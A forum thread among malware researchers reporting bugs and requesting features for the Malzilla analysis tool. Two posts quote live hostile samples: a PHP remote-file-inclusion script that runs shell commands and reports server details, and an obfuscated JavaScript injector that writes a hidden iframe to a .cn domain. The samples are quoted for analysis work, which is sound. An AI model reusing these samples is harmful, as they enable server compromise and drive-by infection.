Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
Title: Re: MalZilla
Post by: bobby on October 12, 2008, 07:31:09 am
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
I'm giving my best to do something about that script that uses HTML elements (where you also need these cookies).
I got one week free from the job (there is no job for me next week in the company), so I hope I'll get these new issues with obfuscation solved (incl. caching the cookies).
Title: Re: MalZilla
Post by: bobby on October 12, 2008, 03:49:44 pm
Implemented extended cache (cookies inclusive).
Partial working solution for the LuckySploit (the one with HTML elements and cookie).
Shellcode analyzer based on libemu is already implemented (you can analyze these WMF, ANI, PDF etc. exploits now).
As soon as I get some more free time, I'll finish LuckySploit deobfuscation and I'll push a release.
Malzilla's site would also need some updating :(
Title: Re: MalZilla
Post by: MysteryFCM on October 12, 2008, 03:54:09 pm
Looking forward to it dude :)
Title: Re: MalZilla
Post by: JohnC on October 12, 2008, 06:38:16 pm
Keep up the good work :)
Title: Re: MalZilla
Post by: Kayrac on October 13, 2008, 04:23:51 am
Any chance for in program updating? :), i always hated having to dl new versions manually :P
Title: Re: MalZilla
Post by: bobby on October 23, 2008, 07:59:19 pm
@Kayrac
Pretty much impossible with SourceForge's organization of mirrors.

@all
1.1.0 is uploaded to the servers. Mirrors will probably need some time to synchronize.
Now I need to sit down and write some documentation and tutorials on new features.
Title: Re: MalZilla
Post by: MysteryFCM on October 23, 2008, 08:13:26 pm
Cheers dude :)
Title: Re: MalZilla
Post by: JohnC on October 23, 2008, 10:07:17 pm
Clicking detect in the Kalimero tab with nothing in the box causes MalZilla to freeze.

On the Misc Decoders tab, it would be nice to have a little checkbox or radio button to enable/disable the "Override default delimiter" option. So that if it is enabled whatever is in the box will be the delimiter, even if nothing is in the box. This would be useful for when you got hex without the %. Or perhaps an insert character at every increment, like UltraEdit. These are not important features though, so if they are too time consuming are could incorporate bugs, don't worry ;)
Title: Re: MalZilla
Post by: bobby on October 24, 2008, 06:38:42 am
Thanks.

@JohnC
Interesting, Kalimero freezes in a lot of situations. I didn't tested its robustness. I have used it just for getting HTML objects for LuckySploit.
About working without delimiter in Misc decoders - it is possible to do for encodings with fixed length of a number (e.g. hex), but it can't be done as general rule because of e.g. decimal numbers (1,10,100) where the length of one member can be 1 to 3.
You can insert a delimiter by using PScript, and example script for such task is already included with Malzilla (I believe it was added with Malzilla 0.9.3 or even 0.9.2.1).
It is not a problem to do insertion of delimiter, or decoding without delimiter. I'll wait a couple of days to see if there is more bug reports, and I'll push another release.
Title: Re: MalZilla
Post by: bobby on October 24, 2008, 07:34:18 am
Localized and fixed the Kalimero bug.
It was a stupid cleaning routine that was used to remove empty rows from the array - there was no exit if the array didn't have any row.

@JohnC
Please do some testing with caching HTTP headers (your request for this version)
btw. there is an option on Settings > Download tab > Add project info to saved files. That would also store all the relevant data into saved HTML documents, and this option is also present in Malzilla for very long time.
Title: Re: MalZilla
Post by: JohnC on October 24, 2008, 12:52:15 pm
"Add project info to saved files" is enabled by default in MalZilla 1.1.0 but I'm not sure where I should be looking for the HTML files, I don't see them. When I load a cached page, I don't get the headers.

Also I noticed this strange bug.

(http://img82.imageshack.us/img82/8319/67773691dy2.png)

The site in question is an NX domain site, so MalZilla couldn't access it. The cache file d41d8cd98f00b204e9800998ecf8427e is 0 bytes long. This is because MalZilla tries to save a cache for sites that don't work aswell it seems. If you test MalZilla trying to access any site that doesn't exist, it will create the 0 byte file in the cache folder, and if you try to load it, it will load the empty file. However if you visit another site which doesn't work it will not add this site to the cache because it has the same md5 hash as the other site. But if you try and open the original cached page, it will then give you that error.

And another little bug.

(http://img359.imageshack.us/img359/6370/61785352yx7.png)

Clear the URL box. Expand the url box to see all visited urls but don't click any, so that the url box is still empty. Then click "Load from cache". It will produce the Debug error message.

Title: Re: MalZilla
Post by: Orac on October 24, 2008, 01:41:24 pm
bobby, is version 1.1.0 available at anysite other than sourceforge, everytime i try and DL it, it crashes on me (not the first time ive had this problem with sourceforge !!)
Title: Re: MalZilla
Post by: JohnC on October 24, 2008, 01:49:08 pm
http://www.malwaredomainlist.com/malzilla_1.1.0.zip
Title: Re: MalZilla
Post by: Orac on October 24, 2008, 02:49:12 pm
Thanks John  ;D
Title: Re: MalZilla
Post by: sowhat-x on October 24, 2008, 03:32:15 pm
Regarding SF downloads in general / for future reference...
Assuming that you know the exact name of the package you wanna download,
eg."malzilla_1.1.0.zip" in this case,then you can substitute the mirroring server's name as below...

Quote
http://heanet.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://dfn.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://surfnet.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://kent.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://switch.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://ovh.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip

And it goes on...don't remember by heart all the available mirrors there... ;-)

Alternatively,someone could use the following...
but I think this one takes a bit more to update/mirror the revisions,not really sure about that:
http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/m/ma/malzilla/
Title: Re: MalZilla
Post by: bobby on October 24, 2008, 04:09:07 pm
@JohnC

About 0-byte files - it is so by design. Can you suggest better behavior which better suits your needs?

About "debug" message, it is from function that makes corrections in URL (hxxp > http and fxp>ftp).
I've removed the message.

btw. these is some features of Malzilla that I still didn't documented.

Command-line parameters:

-url "www.aa.aa" - open Malzilla and put the URL in URL box - this goes through URL fix routine mentioned above, so you can supply hxxp://... links
-html file.ext - open Malzilla and load file in Download tab
-js file.ext - open Malzilla and load file in Decoder tab

I'm still looking for solution to integrate Malzilla with browsers, so that the browser open Malzilla if hxxp link is clicked.

btw. Today I have done a lot of fixes (how dumb I was with handling of Unicode...)
Will push a bugfix release as soon as possible (0-bytes problem mentioned by JohnC need to be fixed when I get feedback from JohnC).
Title: Re: MalZilla
Post by: bobby on October 24, 2008, 04:12:36 pm
@JohnC
"Adding project info" affects just the files at saving from right-click menu > Save to file

@all
Please do not forget right-click menu. The best things are in that menu.
Just take a look at "Run script" sub-menu.
Title: Re: MalZilla
Post by: bobby on October 24, 2008, 04:32:03 pm
@Orac
Indeed, SF can be a PITA sometimes. I'll see what I can do (need to read the agreement with SF again, to see not to do something against the agreement).
I get the best results when downloading from Ireland mirror (can't recall the name).
Title: Re: MalZilla
Post by: JohnC on October 24, 2008, 05:09:52 pm
@JohnC
"Adding project info" affects just the files at saving from right-click menu > Save to file

@all
Please do not forget right-click menu. The best things are in that menu.
Just take a look at "Run script" sub-menu.

It just seems to save the webpage, there aren't any HTTP headers saved with it.
Title: Re: MalZilla
Post by: bobby on October 24, 2008, 07:19:36 pm
Hmmm... you just found another bug. It did work.... :(
Title: Re: MalZilla
Post by: Orac on October 25, 2008, 01:01:58 pm
httpS bug

Using malzilla i attempted to reterive, https://www.ba-sat.com/sunshop/images/products/idfeel.txt and it gave me a 500 responce, but i was able to grab the link using other means.

Code: [Select]
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();

Of course why anyone would use a https link for a RFI is another question  ::)
Title: Re: MalZilla
Post by: sowhat-x on October 25, 2008, 01:10:17 pm
...worked fine for me at the very exact moment?Using v1.1.0 obviously...

Code: [Select]
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1= @diskfreespace($pwd1);
$all1disk_total_space($pwd1);
$used = ConvertBytes($all1-$free1);
$free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free 0;}
$all ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all 0;}
if (@
is_writable($pwd1)) {$perm "[W]";} else {$perm "[R]";}
if (@
ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf "ON";} else {$sf "OFF";}

echo 
"FeeLCoMz".$sf."<br>";
echo 
"uname -a: $un<br>";
echo 
"os: $os<br>";
echo 
"id: $id1<br>";
echo 
"pwd: $pwd1<br>";
echo 
"php: $php1<br>";
echo 
"software: $sof1<br>";
echo 
"srvip: $ip1<br>";
echo 
"srvname: $name1<br>";
echo 
"free: $free<br>";
echo 
"used: $used<br>";
echo 
"total: $all $perm<br>";

function 
ConvertBytes($number) {
  
$len strlen($number);
  if(
$len 4) { return sprintf("%d b"$number); }
  if(
$len >= && $len <=6) { return sprintf("%0.2f Kb"$number/1024); }
  if(
$len >= && $len <=9) { return sprintf("%0.2f Mb"$number/1024/1024); }
  return 
sprintf("%0.2f Gb"$number/1024/1024/1024);
}

function 
ex($cfe) {
  
$res '';
  if (!empty(
$cfe)) {
    if(
function_exists('exec')) {
      @
exec($cfe,$res);
      
$res join("\n",$res);
    } elseif(
function_exists('shell_exec')) {
      
$res = @shell_exec($cfe);
    } elseif(
function_exists('system')) {
      @
ob_start();
      @
system($cfe);
      
$res = @ob_get_contents();
      @
ob_end_clean();
    } elseif(
function_exists('passthru')) {
      @
ob_start();
      @
passthru($cfe);
      
$res = @ob_get_contents();
      @
ob_end_clean();
    } elseif(@
is_resource($f = @popen($cfe,"r"))) {
      
$res "";
      while(!@
feof($f)) { $res .= @fread($f,1024); }
      @
pclose($f);
    } else { 
$res "NULL"; }
  }
  return 
$res;
}

exit;

?>

PS:That's what happens to people that prefer using Vista instead of XP... ;-)
Title: Re: MalZilla
Post by: Orac on October 25, 2008, 02:03:50 pm
Since reading Sow`s post, ive reinstalled V1.1.0 and it still gives me a 500 responce on that link, strange.
Title: Re: MalZilla
Post by: bobby on October 25, 2008, 02:41:23 pm
Works fine here. Either geolocation or you are banned from the server (or your proxy is banned if you are using one).
Title: Re: MalZilla
Post by: JohnC on October 25, 2008, 02:58:07 pm
https://www.ba-sat.com/sunshop/images/products/idfeel.txt

Quote
GET /sunshop/images/products/idfeel.txt HTTP/1.0
Host: www.ba-sat.com:443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept-Encoding: gzip

Works fine in my browser.
Title: Re: MalZilla
Post by: MysteryFCM on October 25, 2008, 06:18:00 pm
I get the best results when downloading from Ireland mirror (can't recall the name).

Tis HEANet ;)

@John,
I get the same error for that one, and it works fine in the browser and in vURL DE;
Title: Re: MalZilla
Post by: sowhat-x on October 25, 2008, 06:48:29 pm
I was talking with Orac about it earlier on irc...we didn't manage to come up with a solution.
It's not dns cache (ipconfig /flushdns),that's for sure.
It's not firewall rules,again,that's for sure.
Then again,the error code returned is 500...which is kinda weird:
because if we assume the fault is not in the server configuration itself,
then the only thing that comes to mind is that the packets,
don't get transmitted correctly from the client itself...thereby triggering that error.

bobby says "either geolocation or you are banned from the server",
which pretty much seems to be the most reasonable explanation to me.
If not,then...not many things come to mind on how to solve this,anyway...

1)Capture two different pcap files in order to compare what's being going on...
one via whatever browser that responds 200 ok,one via Malzilla that returns 500.
2)Trace what Malzilla does when the annoying 500 returns,either via OllyDbg,
or even via a "simpler" api tracer out there...here's a small example list:
http://www.teamfurry.com/index.php?topic=10.msg21#msg21
3)Maybe the server itself doesn't implement ssl correctly?
Here's all the ssl algos that this server supposedly implements/understands...
Title: Re: MalZilla
Post by: Orac on October 25, 2008, 08:12:39 pm
Quote
"either geolocation or you are banned from the server"

Cant be either of those as i can get the link using a browser.

Pcap logs show a zero byte TCP stream when using malzilla, the TCP stream is complety normal when using a broswer.

I tried using malzilla with the same UA as my browser, that didnt make any differnce either.

I think its either something in the server, or the https request from malzilla isnt being accepted for some reason.
Title: Re: MalZilla
Post by: bobby on October 25, 2008, 08:37:10 pm
I've found some reports that OpenSSL library is not working properly on WinXP SP3, so this bug maybe affects Vista too.
Malzilla is using OpenSSL library to manage HTTPS protocol (libeay32.dll in Malzilla's folder).
Version supplied with Malzilla is 0.9.8.7 (0.9.8g)
If you find a newer version, please replace the old dll.
You may try to get the files from here (extract them from the installer):
http://www.slproweb.com/products/Win32OpenSSL.html
Title: Re: MalZilla
Post by: sowhat-x on October 25, 2008, 11:21:13 pm
Quote
Pcap logs show a zero byte TCP stream when using malzilla
...if Wireshark doesn't report much stuff regarding the ssl handshake/algo negotiation in question,
there are couple of alternatives I can think of...or actually,
it's one alternative option,that is to use an ssl 'debugging' proxy instead...
with ssldump as the first one that comes to mind.
Note though that I've never tried to build ssldump under win32...  :-\
http://www.rtfm.com/ssldump/

What I've been in the need of compiling and have used successfully under win32 in the past,
is couple of simpler ssl diagnostic proxy implementations...Mozilla's own ssltap namely:
http://www.mozilla.org/projects/security/pki/nss/tools/ssltap.html
And sshole as well (it had built cleanly under cygwin)...
http://thekonst.net/en/sshole
Title: Re: MalZilla
Post by: Orac on October 26, 2008, 03:27:42 pm
Found the answer from bobbys link
Quote
If you discover 0.9.8i doesn't work (saying something like "The application did not start") and you are running XP SP3 and have installed the VC++ 2008 Redistributables, then revert to XP SP2 and make it a corporate policy to stop using the latest bleeding-edge software from Microsoft.

Guess what, this machine is XP SP3

:(
Title: Re: MalZilla
Post by: MysteryFCM on October 29, 2008, 10:48:17 pm
Just an FYI Bobby, Malzilla is showing the following on initial launch? (loaded without issue after clicking OK)
Title: Re: MalZilla
Post by: bobby on October 29, 2008, 11:44:17 pm
Thats the part of OpenSSL. Malzilla uses this dll to handle https links.
Do you have another libeay32.dll in your path or just the one dll in Malzilla's folder?
Title: Re: MalZilla
Post by: MysteryFCM on October 29, 2008, 11:45:34 pm
Just the one of them :)
Title: Re: MalZilla
Post by: bobby on November 02, 2008, 08:41:24 pm
Malzilla 1.2.0 updated.

I still do not have solution for libeay32.dll
It simply does not work on the systems where newer VS redistributable files are installed.
XP SP3 contains these by default.

This version of VS 2008 redistributables should work:
http://www.microsoft.com/downloads/details.aspx?familyid=9B2DA534-3E03-4391-8A4D-074B9F2BC1BF

I also have a new tutorial prepared, but I have troubles with uploading it to the SourceForge (and not only me, according to SF bug-tracker).
Title: Re: MalZilla
Post by: MysteryFCM on November 02, 2008, 09:14:09 pm
Cheers dude :)
Title: Re: MalZilla
Post by: sowhat-x on November 02, 2008, 09:31:16 pm
I've had encountered numerous troubles when VS 2005 came out,
with it's so called 'side-by-side assemblies'...
having often to mess around with custom-made manifest files etc.,
and even then,not always successfully,
as there were way too many incorrectly compiled programs distributed out there...
But now I was just reading the page over at Shining Light,and it says:
Quote
Although there is a "newer version" of this installer, this is the correct version to install.
That's kinda weird...because assuming the .exes are compiled correctly in the first place,
newer Visual C++ redistributables shouldn't 'break' them...at the worst case scenario,
a .manifest file should be created to point/redirect to the newer libraries:
http://msdn.microsoft.com/en-us/library/aa375632.aspx
...should I assume that older OpenSSL dlls were not compiled with VS2005/2008?

Question is: could OpenSSL be compiled statically into Malzilla.exe itself,
in order to see if the problem persists?Not sure if this is possible...plus,one more idea:
http://www.stunnel.org/download/stunnel/win32/stunnel-4.26-installer.exe
libeay.dll included there is OpenSSL 0.9.8i -> build 15 Sep 2008 with gcc...  ;)
Title: Re: MalZilla
Post by: MysteryFCM on November 02, 2008, 09:37:24 pm
Using 0.9.8i cleared the SSL error I was receiving :)
Title: Re: MalZilla
Post by: sowhat-x on November 02, 2008, 09:42:15 pm
Lol -> gcc p0wned vs studio,ha-ha!  :)
Nice thing is that 0.9.8i is also newer than Shining Light's 0.9.8g,
although from what I see in their changelog,it's mainly crash related bugfixes...
http://www.openssl.org/news/vulnerabilities.html

Edit:Shining Light has updated to 0.9.8i,my mistake...
as I was looking for older versions as well via WebArchive,he-he ;-)
http://www.slproweb.com/products/Win32OpenSSL.html
Title: Re: MalZilla
Post by: bobby on November 02, 2008, 09:43:18 pm
@sowhat-x
I'm looking into other than OpenSSL solutions (there is a couple more SSL solutions out there).
AFAIK, OpenSSL is the most complete solution. I will need to see how useful/complete are the other ones.

@MysteryFCM
Thanks, I will try that.
btw. which Windows version you use?
I have one PC with Win XP SP3, and I will do some testing on it tomorrow.
On this PC that I use for development, I use SP2.
I have bad experiences from updating SP1 > SP2 (network didn't work anymore), and I do not dare to reinstall Windows again if I get problems with installing SP3 (too many tools and settings need to be installed/setup).

I have attached the new tutorial here. Who knows how much time will SF.net need to fix up the problems.
Title: Re: MalZilla
Post by: MysteryFCM on November 02, 2008, 09:47:45 pm
@Bobby,
I've got a machine with XP SP2 and a machine with XP SP3 :)
Title: Re: MalZilla
Post by: sowhat-x on November 02, 2008, 10:11:11 pm
...just read the tutorial...that's really magic there,
need to read it couple of times more in order to get in the flow of it,
damn it -> i'd dare saying it's better than unpacking!  ;D

Irrelevant...does "Kalimero" word mean something by itself?
Or was it a randomly chosen/made-up term?
I'm asking because "Kalimera" in greek means "Good Morning"...  :)
Title: Re: MalZilla
Post by: bobby on November 03, 2008, 04:26:00 am
Kalimero = Calimero = toon character:
http://en.wikipedia.org/wiki/Calimero

We use K instead of C here, as we always read C as Tz (almost like in Tzatziki).
If you need to read it as K (like in the word "Combination"), you need to write K :)

@MysteryFCM
And you was getting that error message on both of them?
Title: Re: MalZilla
Post by: MysteryFCM on November 03, 2008, 06:33:07 pm
I was, yep
Title: Re: MalZilla
Post by: JohnC on November 03, 2008, 06:43:19 pm
A feature suggestion: ability to POST instead of GET. With a little box to put the POST data, (in hex perhaps so that you can allow for newline characters etc). which works pretty much like GET does so that you can save to file whatever data is returned by the server.

Title: Re: MalZilla
Post by: bobby on November 03, 2008, 08:39:34 pm
@JohnC
I'll see what can I do.
POST is not a problem, I was already working on apps using POST methods to submit data to a form.
Only problem is that I do not know what kind of form we have to deal with.
If you just need a box where you will put the data manually, that can be done in one hour.
Title: Re: MalZilla
Post by: MysteryFCM on November 03, 2008, 08:51:26 pm
Because we don't know what is going to be required, the best method for the POST, would be a simple box, where the user fills in the suspected vars required? This would then be included in the post data.
Title: Re: MalZilla
Post by: JohnC on November 03, 2008, 10:40:29 pm
@JohnC
I'll see what can I do.
POST is not a problem, I was already working on apps using POST methods to submit data to a form.
Only problem is that I do not know what kind of form we have to deal with.
If you just need a box where you will put the data manually, that can be done in one hour.

For the time being, that is what I need :)
Title: Re: MalZilla
Post by: pnuemo on November 04, 2008, 01:48:05 am
Upgraded to the latest version.  Somehow my error for libeay32.dll went away!  Working great.
Title: Re: MalZilla
Post by: bobby on November 04, 2008, 09:12:24 pm
Hmmm... POST does not seems to be so trivial.
It can also send line breaks.
So, we actually need an edit box, not one-line box for input.
Also, MIME type should be specified at sending POST, and there is a whole bunch of possible MIME types that one may want to send.
A file can also be sent in POST, and that would be another problem because it is not so generic thing like just sending some strings.

So, I'm thinking about having grid interface with 3 columns:
1. type (string or file)
2. name
3. value (just for string type)

If we do not need to POST files, the whole thing will be a lot easier to implement.
Title: Re: MalZilla
Post by: bobby on November 06, 2008, 08:27:58 pm
Here is a rudimentary POST implementation (file attached).

It does just the application/x-www-form-urlencoded POST method.

That means, when the POST dialog appears, one need to enter the POST data in the form:
name1=value1&name2=value2&...

Do not put the question mark at the beginning of the POST data.
URL where the POST will be sent needs to be put in regular URL box.
Please, you need to see the source of the page where a form requesting the data was, so that you can see the link where to POST the data.

Example:
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Untitled</title>
</head>

<body>
<form action="postresult.php" method="post">
<input type="submit" name="send_button" value="send it!">
<input type="text" name="text_value" value="0123456789">
</form>


</body>
</html>
It means that you need to put postresult.php instead of the current address in the URL field before clicking on POST button.
If the page was www.some_site.com/form.php, you need to put there www.some_site.com/postresult.php, and after that click on POST button.
A dialog for POST data will appear (if you leave it blank, it will abort the operation).
Title: Re: MalZilla
Post by: JohnC on November 06, 2008, 10:43:27 pm
Is it possible to be able to enter the data in hex or something like that to allow for newline characters in the data? Good work by the way.
Title: Re: MalZilla
Post by: bobby on November 07, 2008, 04:25:44 am
You can't send newline with application/x-www-form-urlencoded.

Can you give me an example where you need to send newline, so that I can do some testing?
Title: Re: MalZilla
Post by: MysteryFCM on November 07, 2008, 10:55:45 am
You should be able to send a new line using either CrLf or Chr 10? (or /n)
Title: Re: MalZilla
Post by: bobby on November 07, 2008, 03:40:49 pm
In standard URL encoding, one can use %0d%0a to get CrLf, but I still do not believe it can be interpreted by the server.
There are other methods to POST such kind of data, but there is no way in which I can make a universal form/gui for such thing.

I will elaborate more on this later tonight (just got back from the job, and I need to feed the monsters in my stomach :) )
Title: Re: MalZilla
Post by: bobby on November 08, 2008, 11:58:20 am
Sorry for being a bit late with promised explanation.

First standards for POST method defined just one type of sending data: application/x-www-form-urlencoded

This way someone can send URLEncoded data. URL encoding means that chars like spaces and similar must be encoded before sent. Every such character should be replaced by % followed by the ASCII number of the character.

Anyway, with such method one can't send files. Later revisions of POST method introduces one more MIME type for POST - multipart/form-data.
This MIME type can be composed from other MIME types, where bound marks are used between the various MIME types sent.
Bound marks are random generated, and one bound should be used per POST.
Also the bound should be sent at declaring the MIME type of the POST, so that the server knows what bound mark is used.

Example:

This goes into HTTP headers sent:
MIME type: multipart/form-data, boundary=1234AB_my_unique_boundary

Data is sent like following:
Code: [Select]
--1234AB_my_unique_boundary
content-disposition: form-data; name="file"; filename="some_file.zip"
Content-Type: Application/octet-string


**here goes the some_file.zip as binary**
--1234AB_my_unique_boundary
Content-Disposition: form-data; name="some_form_element"


some_form_element's_data
--1234AB_my_unique_boundary--
As you can see, message is composed from two different MIME types, first one being a file to submit, and the 2nd one a value for a form's element.
There is a boundary mark between the two.
Message can be composed from even more elements, each being of different MIME type.

So, it is pretty impossible to make a GUI that will generate such messages.
I can eventually make a text-box where someone will type such messages manually (inclusive entering the MIME types and boundary marks.
Title: Re: MalZilla
Post by: Orac on December 19, 2008, 11:48:16 am
Bobby

FYI i ran a A-Squared scan on my lappy earlier this morning and it picked up "LuckySploit" as high risk malware  ::)
Title: Re: MalZilla
Post by: JohnC on May 30, 2009, 09:07:11 pm
There is a bug in Decoder tab. When you highlight text, if you start to type it will over write the highlighted text as you would expect but the highlight remains and more text starts to be over written. This bug I can only create after the debug window has been opened.

So open Malzilla, go to decoder tab. Type something incorrect that will allow you to debug it, such as an eval() with the opening parenthesis missing:

eval2321412);

Click debug, close the debug window. Then highlight the number, and start to type, this is what you will see.

(http://img195.imageshack.us/img195/7153/malzillabug.png)

-----------------------------


Second bug, again this bug I can only recreate after the debug window has been opened. Type something, like eval(2321412);
Highlight everything using select all. Type something, it will bring up a message box.

Title: Re: MalZilla
Post by: MysteryFCM on May 30, 2009, 09:09:11 pm
I've actually been able to reproduce this without having to click debug (the first error you mentioned), resulting in my having to remember to click the mouse before trying to move to the part I want to modify/delete.

Figured it was just my machine with no-one else mentioning it before ....
Title: Re: MalZilla
Post by: bobby on May 31, 2009, 04:12:53 am
@JohnC
I know about the first bug. The funny thing is that I does not depend on anything normal.
When I compile Malzilla it can expose this bug or not. It is random. E.g. I compile Malzilla, and the bug occurs, e.g. on Decoder tab. I compile it one more time, there is no bug on Decoder tab, but it occurs on some other tab. It can also happen it does not occur at all.
With such weird behavior, I simply can't find the source of the problem.


About the second bug - this is new to me, but it looks like it is related to the first one.
Title: Re: MalZilla
Post by: Cyborg on June 05, 2009, 08:38:29 pm
Bobby, I don't know if this has been brought up before, but just wanted to say that the Copy/Paste functions do not seem to be working.

I tried copy pasting a code snippet from Malzilla to notepad using right-click, it didn't work. The usual Ctrl+C & Ctrl+V seems to work.

By the way, glad to meet you all, some of you might know me... anyways, I'm Cyborg from Malware Removal (MWR).
Title: Re: MalZilla
Post by: MysteryFCM on June 05, 2009, 08:49:26 pm
Welcome to MDL :)
Title: Re: MalZilla
Post by: Cyborg on June 08, 2009, 11:13:47 am
Thanks a lot Steven :D
Title: Re: MalZilla
Post by: bobby on June 08, 2009, 08:55:20 pm
Hi Cyborg and welcome.

Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.

Do you use Clipboard Monitor (option from tray icon)?
Title: Re: MalZilla
Post by: MysteryFCM on June 08, 2009, 10:04:50 pm
I forgot to mention btw Bobby, the DLL issue I was having (showed up whenever Malzilla was launched) - I fixed it eventually (accidentally) by uninstalling the MS Visual C++ runtime ..... (bit wierd, but it worked)
Title: Re: MalZilla
Post by: bobby on June 09, 2009, 06:57:26 pm
Looks like a conflict between various version of the same DLL.
Title: Re: MalZilla
Post by: MysteryFCM on June 09, 2009, 07:18:33 pm
hehe yep :)
Title: Re: MalZilla
Post by: Cyborg on June 11, 2009, 10:54:44 am
Hi Cyborg and welcome.

Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.

Do you use Clipboard Monitor (option from tray icon)?

Hi Bobby, nice to meet you here.

Version : 1.2.0


I downloaded it from the sourceforge website only 2-3 weeks ago.

And no, I'm using the right click option from inside MalZilla.

By the way, I don't know why, whenever I open MalZilla, I'm getting this error :

(http://img14.imageshack.us/img14/124/captureabu.png)

However, it does not seem to be affecting the way MalZilla works. I've tried replacing the shortcut by deleting the original files and unzipping MalZilla again. That did not fix the issue.

By the way, I'm on Vista Home Premium.

Reg,
Cyborg
Title: Re: MalZilla
Post by: bobby on June 11, 2009, 01:23:57 pm
Hi Cyborg,

I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).

As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.
Title: Re: MalZilla
Post by: Cyborg on June 11, 2009, 08:40:00 pm
Hey Bobby :)

Quote
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).

It has a check placed on it. But the clipboard doesn't work. It doesn't copy normal text either.

Quote
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.

No, I don't have a copy of libeay32.dll in system32. And no, I'm not able to open any https websites (isn't this a known problem on Vista?). I get this in the lower pane :

Quote
=========================
Server IP(s):
0.0.0.0

=========================
HTTP headers:

GET / HTTP/1.0
Host: webparent.sabis.net:443
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.9 (KHTML, like Gecko) Safari/521.9
Accept-Encoding: gzip

Above is a working example of the website : https://webparent[dot]sabis[dot]net
Title: Re: MalZilla
Post by: MysteryFCM on June 11, 2009, 09:13:21 pm
Cyborg,
Go to Add/Remove Programs (Programs and Features on Vista), and uninstall the Microsoft Visual C++ Runtime ....
Title: Re: MalZilla
Post by: Cyborg on June 11, 2009, 09:27:49 pm
Thanks a lot Steven, that seems to have fixed the DLL issue.
Seems like you had already posted the solution before...

Anyways, got any idea about the clipboard issue?
Does anybody else have the same problem??
Title: Re: MalZilla
Post by: MysteryFCM on June 11, 2009, 10:09:27 pm
I've had the issue when copy/pasting from the shellcode/hex view, but not the rest of the program. When the problem occurs I either have it save the results, or use "Copy selection ...."
Title: Re: MalZilla
Post by: JohnC on June 18, 2009, 08:17:07 pm
Code: [Select]
function LApySnWQkMr(){};LApySnWQkMr.prototype = {getRandString : function(){var l=16,c='0Y1R2Y3R4F5R6Y7)8R9FaYb}cRdFeFf}'.replace(/[\)F\}YR]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},path:String.fromCharCode(100)+new String("9")+"9"+"q"+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110),alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},install : function(){if(!this.alreadyInstalled()){var s="<(d(iHv+ (s$tHy+l,e,=(\'+d+i,sHpHlHa+y,:+n+o$n(e$\'$>H<HiHf$r(a(m(e( Hs,r,c(=,\'+".replace(/[,\$H\(\+]/g, '')+this.getFrameURL()+"\'D>j<D/DitfjrDahmheh>D<C/CdtiDvt>h".replace(/[jDhCt]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehCtPmelC>e<LbPoedUyP>L'.replace(/[PULCe]/g, '')+s+'<C/$b$oCdCy~>n<C/~h~tCm$lC>$'.replace(/[Cp\$n~]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.path + this.host;},cookieValue:1,setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },host:'/may.cn/',cookieName:'gfcehdba'};var ocho=new LApySnWQkMr();ocho.install();

Format Code, will break a string or something in the code above and stop it from working as it should.
Title: Re: MalZilla
Post by: JohnC on June 19, 2009, 10:39:15 pm
Here is another example of that will decode, but when you use Format Code, it will no longer decode.

Code: [Select]
